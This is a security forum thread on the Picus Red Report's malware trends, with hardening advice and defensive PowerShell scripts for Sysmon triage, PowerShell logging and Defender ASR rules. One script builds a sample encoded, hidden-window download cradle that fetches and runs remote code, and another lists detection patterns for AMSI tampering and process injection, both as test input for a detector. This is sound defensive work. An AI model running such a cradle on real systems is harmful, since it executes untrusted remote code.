Serious Discussion Pico Red Report 2025

Victor M

Oct 3, 2022
Picus' Red Report deals with trends in malware and attack tactics.

Picus Labs processed more than 1 million pieces of malware collected between January and December 2024 to reveal a comprehensive view of the latest tactics, techniques, and procedures being employed by adversaries across the planet. Each detected TTP was classified via the MITRE ATT&CK® Framework, which resulted in the identification of over 14 million malicious actions. This provided Picus with extremely granular insight into the most commonly deployed techniques, shedding light on critical information concerning these constantly shifting attack strategies. Among these, the most striking is that this yearʼs Red Report reveals that malware, specifically strains targeting credential stores, increased from 8% in 2023 to 25% in 2024, thus a 3X surge in prevalence, a fact that highlights the popularity and success of this emerging threat.

The Red Report also reveals that 93% of 2024ʼs malicious actions were carried out using the top ten MITRE ATT&CK techniques. These findings will help security teams make better-informed decisions and concentrate on defending against the most prevalent threats in today's cyber environment.

Stealth Techniques Continue to Dominate: Evasion and Persistence at the Core

T1055 Process Injection, seen in 31% of analyzed samples, shows further movement to stealthier approaches as code injected into a legitimate process evades detection in many security solutions. In addition, T1059 Command and Scripting Interpreter stands out among the top techniques that allow attackers to conduct malicious operations through native tools, such as PowerShell and Bash.

See how to deal with T1055 Process Injection here: Advanced Plus Security - Victor M ESET based Persistence Stopping detailed Config
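The excerpt above says T1055 works because the injected code runs inside a process the security stack already trusts, so a process-start view never sees it. What does see it is the cross-process memory traffic that every injection variant needs: opening another process with write or thread-creation rights, then starting a thread in it. The script below is an added example, not part of the Picus report or of this thread, that triages Sysmon CreateRemoteThread (event ID 8) and ProcessAccess (event ID 10) events for exactly that. It assumes Sysmon is installed with a configuration that logs both IDs (ID 10 is only written when the config contains a ProcessAccess rule); the target and allow-lists are hypothetical starting values, and the three sample records at the end are constructed so the scoring logic can be exercised on a machine without Sysmon.

```powershell
# Added example (not from the Picus report or the thread): triage Sysmon
# CreateRemoteThread (ID 8) and ProcessAccess (ID 10) events for the
# cross-process memory operations that T1055 variants rely on.
# Assumes Sysmon is installed with a config that logs ID 8 and ID 10.

# Access-mask bits (PROCESS_* rights). Writing memory and creating a thread
# in another process are the two rights injection needs; reading lsass.exe
# memory is what credential dumpers need.
$PROCESS_CREATE_THREAD = 0x0002
$PROCESS_VM_READ       = 0x0010
$PROCESS_VM_WRITE      = 0x0020

# Targets commonly chosen for injection or credential access (hypothetical
# starting list; extend it for your environment).
$SensitiveTargets = @('lsass.exe','explorer.exe','svchost.exe','chrome.exe','msedge.exe','firefox.exe')

# Sources that legitimately touch other processes' memory (AV engines,
# debuggers). Hypothetical allow-list; build yours from your own baseline.
$AllowedSources = @('C:\Program Files\Windows Defender\MsMpEng.exe')

function ConvertFrom-SysmonEvent {
    # Flatten the EventData of one Sysmon event into a hashtable.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml  = [xml]$Event.ToXml()
    $data = @{ Id = $Event.Id; Time = $Event.TimeCreated }
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    return $data
}

function Test-InjectionCandidate {
    # Decide whether one parsed event looks like cross-process injection or
    # an lsass.exe read. Returns $null when benign, otherwise a reason string.
    param([hashtable]$E)
    $src = [string]$E.SourceImage
    $dst = [string]$E.TargetImage
    if ($AllowedSources -contains $src) { return $null }
    if ($src -eq $dst) { return $null }                    # self-access is normal
    $dstName = [System.IO.Path]::GetFileName($dst).ToLower()
    switch ($E.Id) {
        8  { return "CreateRemoteThread into $dstName (start $($E.StartAddress))" }
        10 {
            $mask      = [int64]$E.GrantedAccess           # Sysmon logs e.g. "0x1FFFFF"
            $canWrite  = ($mask -band $PROCESS_VM_WRITE) -ne 0
            $canThread = ($mask -band $PROCESS_CREATE_THREAD) -ne 0
            $canRead   = ($mask -band $PROCESS_VM_READ) -ne 0
            if ($dstName -eq 'lsass.exe' -and $canRead) {
                return "lsass.exe opened with PROCESS_VM_READ (mask $($E.GrantedAccess)); possible credential dump"
            }
            if ($SensitiveTargets -contains $dstName -and ($canWrite -or $canThread)) {
                return "$dstName opened with write/thread rights (mask $($E.GrantedAccess))"
            }
        }
    }
    return $null
}

function Get-InjectionCandidates {
    # Pull recent ID 8/10 events from the live Sysmon log and score them.
    param([int]$Hours = 24)
    $filter = @{ LogName   = 'Microsoft-Windows-Sysmon/Operational'; Id = 8,10
                 StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $e   = ConvertFrom-SysmonEvent $_
        $why = Test-InjectionCandidate $e
        if ($why) { [pscustomobject]@{ Time = $e.Time; Source = $e.SourceImage; Target = $e.TargetImage; Reason = $why } }
    }
}

# Constructed sample records (not real telemetry) so the scoring logic can
# be exercised without Sysmon present.
$samples = @(
    @{ Id = 10; SourceImage = 'C:\Users\u\Downloads\update.exe';           TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1010' },
    @{ Id = 8;  SourceImage = 'C:\Users\u\AppData\Local\Temp\x.exe';       TargetImage = 'C:\Windows\explorer.exe';       StartAddress  = '0x00007FF6A1B20000' },
    @{ Id = 10; SourceImage = 'C:\Program Files\Windows Defender\MsMpEng.exe'; TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1FFFFF' }
)
foreach ($s in $samples) { '{0} -> {1}' -f $s.SourceImage, (Test-InjectionCandidate $s) }

# Live hunt (requires Sysmon):
# Get-InjectionCandidates -Hours 48 | Format-Table -AutoSize
```

The first sample is flagged for reading lsass.exe memory, the second for a remote thread in explorer.exe, and the third is dropped by the allow-list. Expect noise from legitimate software on a real host; the point of the allow-list is to shrink that noise from your own baseline rather than to ship a universal one.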

See how to deal with T1055 Process Injection here: Advanced Plus Security - Victor M ESET based Persistence Stopping detailed Config
Interesting share – thanks for posting the excerpt and link.

A few key takeaways from what you quoted:

  • Credential‑stealing malware is exploding: jumping from 8% to 25% of samples in just one year is huge. That likely includes:
    • Stealers targeting browser password stores
    • Password managers / secure vaults
    • Windows Credential Manager and DPAPI‑protected data
    • Session tokens / cookies (for “passwordless” logins)
  • A small number of TTPs dominate: 93% of malicious actions mapped to just the top 10 ATT&CK techniques. That’s actually good news for defenders – hardening a relatively small set of techniques can reduce a lot of risk.
  • Stealth > everything else: process injection (T1055) and command/scripting (T1059) are still core tools of the trade.

T1055 – Process Injection

What the report says matches what has been seen for years: injecting into a legitimate process is still one of the most reliable ways to:

  • Hide malicious code inside trusted processes (e.g. browser, explorer, system processes)
  • Bypass simple application allow‑lists
  • Evade basic AV/EDR that focuses more on “what started” than “what it’s doing now”

Defending against T1055 fully is hard, but you can raise the bar significantly with:

  • EDR/AV with strong behavior monitoring for memory injections, hollowing, APC injection, etc.
  • Tight HIPS / advanced rules (like in your linked ESET config) watching:
    • Processes modifying the memory of other processes
    • Suspicious use of APIs like WriteProcessMemory, CreateRemoteThread, etc.
  • Application hardening & isolation (e.g. browser sandboxing, limiting which processes are allowed to talk to each other)

Your linked thread on Victor M ESET based Persistence Stopping detailed Config is a good example of the kind of “extra” hardening needed if someone wants more than default protection against things like process injection and persistence tricks.

T1059 – Command and Scripting Interpreter

Attackers leaning heavily on PowerShell, CMD, Bash and other interpreters is very consistent with “living off the land”:

  • Native tools are already trusted and whitelisted
  • Scripts are easier to change than binaries
  • In-memory execution keeps disk artefacts minimal

On Windows specifically, useful mitigations include:

  • PowerShell logging (Script Block, Module, and Transcription logging) so you can actually see what’s happening
  • Constrained Language Mode (for non‑admin / untrusted contexts)
  • AppLocker or WDAC rules limiting who/what can run PowerShell, cscript/wscript, etc.
  • Block or monitor LOLBins (regsvr32, mshta, wmic, rundll32, etc.) where possible

What this means practically for home / power users

For people here on MalwareTips, a few practical implications:

  • Focus more on credential security:
    • Use a reputable password manager (with strong master password and MFA)
    • Avoid storing important passwords in the browser if possible
    • Treat cookie/session theft as seriously as password theft (secure browser profile, OS hardening)
  • Don’t rely only on signatures: use products with good behavior blocking, exploit protection and memory inspection.
  • Harden your main browser / daily-use apps: that’s where a lot of process injection and credential stealing focuses.
  • If you’re comfortable tweaking configs: threads like the Victor M ESET config are worth studying and adapting carefully, but always test changes and keep backups of your configuration.

Overall, the Red Report snippet basically confirms that attackers are doubling down on:

  • Stealing what matters most (credentials/sessions)
  • Hiding inside what you already trust (injected processes, native interpreters)

If you’d like, I can help translate some of the top MITRE techniques from the report into concrete hardening steps for a specific product you use (ESET, Kaspersky, Defender, etc.).
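The reply above lists PowerShell Script Block, Module and Transcription logging as the first T1059 mitigation, because without them a `-EncodedCommand` one-liner leaves nothing readable behind. The script below is an added example, not part of the thread, that switches those three channels on and then hunts the resulting Script Block log (event ID 4104) for the patterns droppers and LOLBin chains typically carry. It writes the same registry values the Group Policy settings write, so it also works on Windows Home, where gpedit.msc is not available; the transcript directory is an assumed location, the indicator list is a hypothetical starting set rather than a complete signature set, and the sample command at the end is constructed in the script so the matcher can be exercised offline.

```powershell
# Added example (not from the thread): enable PowerShell logging via the
# policy registry keys, then hunt event ID 4104 for loader-style patterns.
# Run elevated.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed location
    # Script Block Logging: full text of every script block (event ID 4104).
    New-Item -Path "$PolicyRoot\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$PolicyRoot\ScriptBlockLogging" -Name EnableScriptBlockLogging -Type DWord -Value 1
    # Module Logging for all modules (pipeline details, event ID 4103).
    New-Item -Path "$PolicyRoot\ModuleLogging\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path "$PolicyRoot\ModuleLogging" -Name EnableModuleLogging -Type DWord -Value 1
    Set-ItemProperty -Path "$PolicyRoot\ModuleLogging\ModuleNames" -Name '*' -Value '*'
    # Transcription: per-session text transcripts with invocation headers.
    New-Item -Path "$PolicyRoot\Transcription" -Force | Out-Null
    Set-ItemProperty -Path "$PolicyRoot\Transcription" -Name EnableTranscripting -Type DWord -Value 1
    Set-ItemProperty -Path "$PolicyRoot\Transcription" -Name EnableInvocationHeader -Type DWord -Value 1
    Set-ItemProperty -Path "$PolicyRoot\Transcription" -Name OutputDirectory -Value $TranscriptDir
    New-Item -ItemType Directory -Path $TranscriptDir -Force | Out-Null
}

# Indicators seen in droppers and LOLBin chains. PowerShell's -match is
# case-insensitive, so the patterns are written once. Starting set only.
$Indicators = [ordered]@{
    EncodedCommand = '-enc\w*\s+[A-Za-z0-9+/=]{20,}'
    Base64Decode   = 'FromBase64String'
    InvokeExpr     = '\bIEX\b|Invoke-Expression'
    Downloader     = 'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient'
    AmsiTamper     = 'AmsiUtils|amsiInitFailed'
    ReflectiveLoad = '\[Reflection\.Assembly\]::Load|VirtualAlloc|WriteProcessMemory'
    HiddenWindow   = '-w(indowstyle)?\s+hidden|-nop\b|-noprofile'
}

function Test-SuspiciousScriptBlock {
    # Return the names of the indicators that match one script block's text.
    param([string]$Text)
    foreach ($k in $Indicators.Keys) {
        if ($Text -match $Indicators[$k]) { $k }
    }
}

function Find-SuspiciousScriptBlocks {
    # Scan recent 4104 events; emit one row per block with at least $MinHits hits.
    param([int]$Hours = 24, [int]$MinHits = 2)
    $f = @{ LogName   = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
            StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue | ForEach-Object {
        $text = [string]$_.Properties[2].Value          # ScriptBlockText is the third property
        $hits = @(Test-SuspiciousScriptBlock $text)
        if ($hits.Count -ge $MinHits) {
            [pscustomobject]@{ Time    = $_.TimeCreated
                               Hits    = ($hits -join ',')
                               Preview = $text.Substring(0, [Math]::Min(120, $text.Length)) }
        }
    }
}

# Constructed sample (built here, not a real capture) to exercise the matcher
# offline: a typical hidden, encoded download cradle.
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://example.com/a")'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$sample  = "powershell -nop -w hidden -enc $encoded"
$decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(($sample -split '\s+')[-1]))
"Hits on wrapper : $((Test-SuspiciousScriptBlock $sample) -join ', ')"    # EncodedCommand, HiddenWindow
"Hits on payload : $((Test-SuspiciousScriptBlock $decoded) -join ', ')"   # InvokeExpr, Downloader

# After Enable-PowerShellLogging (and a reboot or new session), hunt with:
# Find-SuspiciousScriptBlocks -Hours 48 | Format-Table -Wrap
```

The two-stage check matters: the wrapper only reveals the encoding and hidden-window flags, while the decoded payload is where the download cradle shows up. Script Block Logging records the decoded form as its own 4104 event once it executes, which is why enabling it is worth more than transcription alone.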
 
sure @Bot, go ahead and generate those hardening techniques
Here’s a practical hardening checklist mapped to the main techniques you quoted (Windows‑focused, home/power‑user level).

I’ll cover:
  • General OS/app hardening
  • Extra steps for Microsoft Defender, ESET, and Kaspersky

If you tell me what you actually use, I can later condense this into a short, product‑specific checklist.

1. T1055 – Process Injection

Goal: Make it harder for malware to inject into trusted processes (browsers, system processes, etc.) and stay hidden.

General Windows hardening
  • Keep Windows + browsers fully updated (exploit → code exec → injection).
  • Run as standard user for daily work (not an admin account).
  • Limit software that hooks into everything (game overlays, “tuners”, multiple AVs, shady injectors).
  • Use exploit protection (Windows Security → App & browser control → Exploit protection):
    • Ensure DEP, ASLR, CFG are On by default.
    • Optionally add per‑app hardening for browsers, PDF reader, office suite.

Microsoft Defender
  • Make sure Real‑time protection, Cloud‑delivered protection, and Automatic sample submission are On.
  • Turn on Attack Surface Reduction (ASR) rules where possible (Windows Security → App & browser control → Exploit protection → “Attack surface reduction”). Rules that help against injection/exploitation:
    • “Block Office applications from injecting code into other processes”
    • “Block Office applications from creating executable content”
    • “Block all Office applications from creating child processes” (more for T1059, but also limits injection chains)
  • If you’re comfortable with PowerShell/Group Policy, configure those ASR rules in Block mode rather than Audit.

ESET (NOD32 / Internet Security / Smart Security Premium)
  • Ensure HIPS is Enabled and in at least Smart protection mode.
  • Under Advanced setup → Detection engine:
    • Advanced Memory Scanner – Enabled
    • Exploit Blocker – Enabled and set to Aggressive if you can tolerate potential extra prompts
  • If you are advanced/patient:
    • Create HIPS rules to ask/deny when non‑trusted apps try to:
      • Modify other processes' memory
      • Inject code / create threads in other processes
    • The Victor M config you linked is a solid template; adapt it rather than starting from zero.

Kaspersky (Standard / Plus / Premium, etc.)
  • Ensure System Watcher is Enabled (core for behavior/memory monitoring).
  • In Intrusion Prevention / Application Control:
    • Keep default mode or stricter (e.g. “High”).
    • Unknown/untrusted apps: restrict their ability to interact with other processes.
  • Do not disable heuristics or “Advanced Disinfection” – these help with injected code inside legit processes.

2. T1059 – Command & Scripting Interpreter (PowerShell, CMD, scripts)

Goal: Make it hard for malware/macro documents to abuse PowerShell/CMD/other interpreters silently.

General Windows hardening
  • Uninstall PowerShell v2 (Features → “Turn Windows features on or off”) – it lacks modern logging/security.
  • Treat .ps1 / .vbs / .js files as dangerous:
    • Don’t double‑click random scripts
    • View extension for known file types (disable “Hide extensions…” in Explorer)
  • If you’re advanced, consider:
    • AppLocker or WDAC to allow PowerShell only for admins or from certain paths.
    • PowerShell Constrained Language Mode for non‑admin users.

Microsoft Defender
  • Enable relevant ASR rules (again: App & browser control → Attack surface reduction):
    • “Block all Office applications from creating child processes” (stops Word/Excel spawning PowerShell/CMD)
    • “Block Office applications from creating executable content”
    • “Block JavaScript or VBScript from launching downloaded executable content”
    • “Block executable content from email client and webmail”
  • For visibility, enable PowerShell logging (if you have Pro/Enterprise and are comfortable with gpedit.msc):
    • Script Block Logging
    • Module Logging

ESET
  • In Advanced setup → Detection engine, make sure Script Scanner is enabled (if available in your edition).
  • Use HIPS rules to control interpreters:
    • Prompt or block when powershell.exe, wscript.exe, cscript.exe are started by:
      • Office apps (winword.exe, excel.exe)
      • Browsers (chrome.exe, msedge.exe, firefox.exe)
      • Archive managers (winrar.exe, 7zFM.exe, etc.)
  • Optionally, restrict script engines to admin use only on your system via HIPS.

Kaspersky
  • Ensure Script Monitoring / “Monitoring of application activities” is enabled.
  • In Application Control:
    • Place PowerShell, wscript/cscript in a stricter group (e.g. “Low restricted”).
    • Block or prompt when Office/browsers launch PowerShell or CMD (you can create custom rules based on parent process).

3. Credential Theft & Stealer Malware

Goal: Protect browser‑stored passwords, password managers, cookies/sessions, and OS credentials (LSASS, DPAPI).

General practices
  • Use a reputable password manager with:
    • Strong master password
    • MFA (if cloud‑syncing)
    • Short auto‑lock timeout
  • Minimize storing important passwords in the browser. If you must:
    • Use a separate, locked browser profile for high‑value sites (banking, email, admin panels).
  • Turn on full‑disk encryption (BitLocker) where possible.
  • Avoid running random “stealer‑friendly” things: cracked software, cheat tools, unknown “optimizers”.

Microsoft Defender
  • Enable ASR rule “Block credential stealing from LSASS” (very important).
  • On Windows Pro/Enterprise (and compatible hardware):
    • Turn on Credential Guard if available.
    • Enable LSA protection (RunAsPPL) – this makes dumping LSASS harder.
  • Keep SmartScreen enabled in both Edge and Windows (reduced chance of running stealers in the first place).

ESET
  • Keep Web access protection and Antiphishing enabled to cut off many stealer delivery vectors.
  • Use Banking & Payment Protection for financial/banking sites (isolated hardened browser window).
  • If using ESET Password Manager, enable:
    • Strong master password
    • 2FA
    • Short auto‑lock time
  • Optionally create HIPS rules to:
    • Prevent non‑browser apps from accessing browser profile folders
    • Block unknown apps from reading password manager database locations

Kaspersky
  • Use Safe Money for banking and key financial sites (runs them in a hardened mode).
  • Ensure System Watcher is On – it can detect many stealer behaviors (e.g. grabbing browser data, suspicious memory reads).
  • If using Kaspersky Password Manager:
    • Enable 2FA if supported
    • Set strict auto‑lock
  • In Application Control, block untrusted apps from:
    • Accessing browser profile folders
    • Accessing credential‑related files in AppData

4. Persistence (autoruns, WMI, tasks) – quick note

Even though you didn’t quote a specific ATT&CK ID here, persistence is closely linked.

Quick wins:
  • Defender: enable ASR rule “Block persistence through WMI event subscription”.
  • Periodically check startup items with tools like Autoruns (careful what you disable).
  • Avoid running software that insists on auto‑starting unless you really need it.

---

If you tell me:
  • Your OS version (e.g. Windows 10/11 Home/Pro)
  • Your main AV (Defender/ESET/Kaspersky/other)
I can turn this into a short, concrete “do this / click here / set this to X” checklist tailored to your setup.
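The Defender items in the checklist above (ASR rules in Block mode, LSA protection, removing the PowerShell v2 engine, checking Credential Guard) are all settable from PowerShell, and reading them back afterwards is the only way to be sure a rule was really applied rather than silently ignored. The script below is an added example, not part of the thread, that does both. It assumes Windows 10/11 with Microsoft Defender as the active antivirus: when ESET, Kaspersky or another third-party product owns real-time protection, Defender runs passively and ASR rules have no effect. The rule GUIDs are the ones Microsoft publishes in its ASR rules reference; cross-check them there before deploying.

```powershell
# Added example (not from the thread): apply the Defender-side checklist
# items and read the result back. Run elevated with Defender active.

# Rule name -> GUID, limited to the rules named in the checklist.
$AsrRules = [ordered]@{
    'Block credential stealing from LSASS'                       = '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2'
    'Block Office apps from injecting code into other processes' = '75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84'
    'Block all Office apps from creating child processes'        = 'd4f940ab-401b-4efc-aadc-ad5f3c50688a'
    'Block Office apps from creating executable content'         = '3b576869-a4ec-4529-8536-b80a7769e899'
    'Block JS/VBScript from launching downloaded executables'    = 'd3e037e1-3eb8-44c8-a917-57927947596d'
    'Block executable content from email client and webmail'     = 'be9ba2d9-53ea-4cdc-84e5-9b1eeee46550'
    'Block persistence through WMI event subscription'           = 'e6db77e5-3df2-4cf1-b95a-636979351e5b'
}

function Set-AsrRules {
    # 'Enabled' blocks, 'AuditMode' only logs. On a machine with Office,
    # run in AuditMode for a while and review the ASR events before blocking.
    param([ValidateSet('Enabled','AuditMode','Disabled')][string]$Mode = 'Enabled')
    foreach ($id in $AsrRules.Values) {
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $Mode
    }
}

function Get-AsrRuleState {
    # Read back our rules by GUID. Defender reports actions as
    # 0 = Off, 1 = Block, 2 = Audit, 6 = Warn.
    $p   = Get-MpPreference
    $map = @{}
    $ids = @($p.AttackSurfaceReductionRules_Ids)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        $map[([string]$ids[$i]).ToLower()] = [int]$p.AttackSurfaceReductionRules_Actions[$i]
    }
    foreach ($name in $AsrRules.Keys) {
        $state = switch ($map[$AsrRules[$name]]) { 1 {'Block'} 2 {'Audit'} 6 {'Warn'} default {'Off'} }
        [pscustomobject]@{ Rule = $name; State = $state }
    }
}

function Enable-LsaProtection {
    # RunAsPPL=1 runs LSASS as a protected process; takes effect after reboot.
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name RunAsPPL -Type DWord -Value 1
}

function Remove-PowerShellV2 {
    # The v2 engine has no script block logging or AMSI; remove the feature.
    Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null
}

function Get-CredentialPosture {
    # One-screen summary of the credential-theft defences on this machine.
    $lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    $dg  = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $v2  = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    [pscustomobject]@{
        LsaRunAsPPL           = ($lsa.RunAsPPL -eq 1)
        CredentialGuardActive = [bool]($dg.SecurityServicesRunning -contains 1)   # 1 = Credential Guard
        PowerShellV2Removed   = ($v2.State -ne 'Enabled')
        DefenderRealtime      = -not (Get-MpPreference).DisableRealtimeMonitoring
    }
}

# Usage: apply, then verify. Reboot afterwards for RunAsPPL to take effect.
# Set-AsrRules -Mode Enabled; Enable-LsaProtection; Remove-PowerShellV2
Get-AsrRuleState   | Format-Table -AutoSize
Get-CredentialPosture | Format-List
```

`Get-AsrRuleState` is the check worth keeping even if you set the rules by some other route: a rule that shows as Off after you believed you enabled it is the usual sign that another AV holds real-time protection, or that a management policy is overriding local settings.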